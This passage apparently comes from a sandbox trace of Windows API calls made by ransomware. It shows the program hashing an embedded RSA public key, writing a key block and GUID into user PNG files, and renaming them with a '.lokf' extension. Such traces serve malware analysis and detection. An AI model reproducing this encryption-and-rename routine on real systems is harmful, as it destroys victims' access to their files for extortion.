KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.232] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.232] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.232] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.232] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.232] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.232] GetLastError () returned 0x0 [0059.233] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.233] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.233] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.233] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.233] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd1e0) returned 0x9c83710 [0059.233] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c834f0 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4f0 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83538 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b508 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b538 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b550 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.233] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b550 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b550 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b538 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b550 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.234] GetCurrentThreadId () returned 0x9e0 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7e228 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.235] GetCurrentThreadId () returned 0x9e0 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b538 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b550 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b520 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b568 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b538 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b538 | out: hHeap=0x660000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b568 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b550 | out: hHeap=0x660000) returned 1 [0059.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b520 | out: hHeap=0x660000) returned 1 [0059.238] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd1e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.238] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.238] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.238] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.238] CloseHandle (hObject=0x5cc) returned 1 [0059.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.239] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TSPFwFmW70A.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tspfwfmw70a.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TSPFwFmW70A.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tspfwfmw70a.png.lokf")) returned 1 [0059.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5db5ed0, ftCreationTime.dwHighDateTime=0x1d4d18b, ftLastAccessTime.dwLowDateTime=0x1f2e2ea0, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x1f2e2ea0, ftLastWriteTime.dwHighDateTime=0x1d4d466, nFileSizeHigh=0x0, nFileSizeLow=0x10a5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urTk_7SAl.png", cAlternateFileName="URTK_7~1.PNG")) returned 1 [0059.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\urTk_7SAl.png") returned=".png" [0059.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\urTk_7SAl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\urtk_7sal.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.240] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=68187) returned 1 [0059.241] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.243] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10a35, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.243] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.244] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10a5b, lpOverlapped=0x0) returned 1 [0059.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.244] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.245] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.245] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.245] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.245] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.245] GetLastError () returned 0x0 [0059.245] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.245] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.245] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.245] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.245] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.246] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.246] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10a5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.246] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.246] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.246] CloseHandle (hObject=0x5cc) returned 1 [0059.247] 